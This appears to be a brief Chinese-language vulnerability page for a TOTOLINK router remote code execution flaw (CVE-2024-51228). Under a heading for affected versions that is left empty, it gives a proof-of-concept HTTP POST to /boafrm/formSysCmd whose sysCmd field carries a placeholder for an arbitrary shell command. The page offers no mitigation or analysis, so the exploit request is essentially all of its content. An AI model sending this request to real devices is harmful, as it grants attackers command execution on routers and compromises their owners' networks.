TOTOLINK远程代码执行漏洞(CVE-2024-51228)

TOTOLINK远程代码执行漏洞(CVE-2024-51228)

影响版本

poc

POST /boafrm/formSysCmd HTTP/1.1
Host: {Target IP}:{Target Port}
User-Agent: curl/7.81.0
Accept: */*
Content-Length: <length>
Content-Type: application/x-www-form-urlencoded

sysCmd={shell_cmd}

漏洞来源